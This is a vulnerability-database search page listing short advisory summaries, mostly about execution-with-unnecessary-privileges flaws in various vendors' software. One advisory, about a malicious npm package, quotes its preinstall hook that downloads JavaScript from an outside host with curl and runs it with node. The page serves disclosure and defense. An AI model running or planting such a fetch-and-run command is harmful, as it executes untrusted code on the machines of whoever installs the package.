Lucene search
K

16 matches found

OSV
OSV
added 2026/06/11 12:38 p.m.8 views

MAL-2026-5645 Malicious code in sn-internal-test (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 215bae963612bf6e45ac8a32644e51b297c72d021048aa58a58fb0a5d0cb396d package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install...

5.8AI score
Exploits0References3
CVE
CVE
added 2026/05/28 7:48 p.m.32 views

CVE-2026-49095

Kibana Fleet policy management feature is affected by CVE-2026-49095 due to improper input validation (CWE-20). An authenticated user with Fleet management privileges can inject values into a configuration override mechanism, causing Elastic Agents to be issued API keys with elevated Elasticsearc...

6.5CVSS5.8AI score0.00262EPSS
Exploits0References1Affected Software1
Cvelist
Cvelist
added 2026/05/12 1:31 p.m.26 views

CVE-2026-40638

Dell PowerScale InsightIQ, versions 5.0.0 through 6.2.0, contains an execution with unnecessary privileges vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to elevation of privileges...

6.7CVSS0.00119EPSS
Exploits0References1
ATTACKERKB
ATTACKERKB
added 2026/04/27 6:10 p.m.4 views

CVE-2026-25908

Dell Alienware Command Center AWCC, versions prior to 6.13.8.0, contain an Execution with Unnecessary Privileges vulnerability in the AWCC. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of Privileges...

6.7CVSS5.3AI score0.00093EPSS
Exploits0References2
Snyk
Snyk
added 2026/04/23 2:17 p.m.6 views

Execution with Unnecessary Privileges

Overview Affected versions of this package are vulnerable to Execution with Unnecessary Privileges through the runscript.py and runscript.rb script execution paths in the script runner components. An attacker can read sensitive credentials by running a script that prints the process environment,...

9.6CVSS5.9AI score0.00341EPSS
Exploits1References2
EUVD
EUVD
added 2025/12/12 3:30 p.m.3 views

EUVD-2025-203080

Execution with Unnecessary Privileges vulnerability in Nebim Neyir Computer Industry and Services Inc. Nebim V3 ERP allows Expanding Control over the Operating System from the Database.This issue affects Nebim V3 ERP: from 2.0.59 before 3.0.1...

8.8CVSS6.5AI score0.0035EPSS
Exploits0References2
Snyk
Snyk
added 2025/10/30 12:31 p.m.2 views

Execution with Unnecessary Privileges

Overview Affected versions of this package are vulnerable to Execution with Unnecessary Privileges via the bulk create API with the overwrite action. An attacker can modify existing records by submitting crafted requests with only CREATE privileges. Remediation Upgrade apache-airflow-core to...

5.4CVSS7.1AI score0.00396EPSS
Exploits0References2
Cvelist
Cvelist
added 2025/08/22 11:41 a.m.9 views

CVE-2025-9257 Uniong|WebITR - Arbitrary File Reading through Path Traversal

WebITR developed by Uniong has an Arbitrary File Reading vulnerability, allowing remote attackers with regular privileges to exploit Absolute Path Traversal to download arbitrary system files...

7.1CVSS0.00502EPSS
Exploits0References2
Positive Technologies
Positive Technologies
added 2025/08/14 12:0 a.m.5 views

PT-2025-33357 · Dell · Dell Data Lakehouse

Name of the Vulnerable Software and Affected Versions: Dell Data Lakehouse versions prior to 1.5.0.0 Description: Dell Data Lakehouse is susceptible to an Execution with Unnecessary Privileges issue. A local attacker with high privileges could potentially exploit this, resulting in a Denial of...

6.7CVSS6.3AI score0.0013EPSS
Exploits0References5
CVE
CVE
added 2025/02/04 8:2 a.m.44 views

CVE-2024-10239

CVE-2024-10239 concerns a stack overflow in the firmware image verification of the Supermicro MBD-X12DPG-OA6. The issue arises from an unchecked fat->fsd.max_fld in the image verification path, allowing an administrator-controlled upload of a crafted image to potentially trigger the overflow. ...

7.2CVSS7.1AI score0.00489EPSS
Exploits0References1
OSV
OSV
added 2023/09/27 3:19 p.m.3 views

CVE-2023-4003

One Identity Password Manager version 5.9.7.1 - An unauthenticated attacker with physical access to a workstation may upgrade privileges to SYSTEM through an unspecified method. CWE-250: Execution with Unnecessary Privileges...

6.8CVSS5.8AI score0.00473EPSS
Exploits0References1
OSV
OSV
added 2023/09/15 9:15 a.m.5 views

CVE-2023-4662

Execution with Unnecessary Privileges vulnerability in Saphira Saphira Connect allows Remote Code Inclusion.This issue affects Saphira Connect: before 9...

9.8CVSS5.8AI score0.01187EPSS
Exploits0References1
CNNVD
CNNVD
added 2023/08/08 12:0 a.m.6 views

Siemens SICAM TOOLBOX II 安全漏洞

SICAM TOOLBOX II is an engineering solution for plants and systems of all sizes. It allows data collection, data modeling, configuration and parameterization. It is used for process information engineering of automation and central control room systems. Siemens SICAM TOOLBOX II has an Execute wit...

7.8CVSS6.7AI score0.0018EPSS
Exploits0References3
CNNVD
CNNVD
added 2022/06/08 12:0 a.m.10 views

NVIDIA DGX 缓冲区错误漏洞

NVIDIA DGX is a high-performance workstation for deep learning applications from NVIDIA. The NVIDIA DGX A100 suffers from a buffer error vulnerability that originates from a boundary error in the SBIOS in SmbiosPei. An attacker could exploit this vulnerability to trigger out-of-bounds writes and...

6.7CVSS7.4AI score0.00243EPSS
Exploits0References4
CNNVD
CNNVD
added 2021/08/17 12:0 a.m.6 views

xArrow SCADA 输入验证错误漏洞

xArrow SCADA is an installer for industrial control products from xArrow in China. An input validation error vulnerability exists in xArrow SCADA version 7.2 and prior versions, which arises from allowing unauthenticated registry entries to run with application-level privileges...

7.8CVSS7.4AI score0.0025EPSS
Exploits0References4
Check Point Advisories
Check Point Advisories
added 2013/05/16 12:0 a.m.6 views

Sun Java Web Start Splashscreen GIF Decoding Buffer Overflow - Improved Performance (CVE-2008-2086)

The Sun Java Web Start is a component of the Java 2 Runtime Environment JRE. It allows for the network deployment of Java applications. This component enables stand-alone Java applications to be downloaded from a remote network location and invoked on a target machine. There exists a memory...

9.3CVSS8AI score0.07319EPSS
Exploits1
Rows per page
Query Builder